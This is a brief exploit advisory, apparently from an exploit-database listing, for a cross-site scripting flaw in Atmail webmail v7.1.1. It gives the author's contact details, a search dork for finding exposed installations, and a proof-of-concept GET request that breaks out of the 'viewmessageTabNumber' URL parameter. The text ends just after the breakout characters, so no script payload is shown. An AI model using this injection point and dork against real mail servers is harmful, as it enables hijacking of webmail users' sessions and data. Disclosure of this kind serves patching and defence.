============================================================================ | # Title : Atmail v7.1.1 PRO XSS Vulnerability | | # Author : indoushka | | # email : indoushka4ever@gmail.com | | # Tested on : windows 10 FranASSais V.(Pro) | | # Version : v7.1.1 | | # Vendor : www.p30vel.ir | | # Dork : Powered by Atmail 7.1.1 | ============================================================================ poc : 1. Cross Site Scripting a) GET - viewmessageTabNumber Request: host/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3">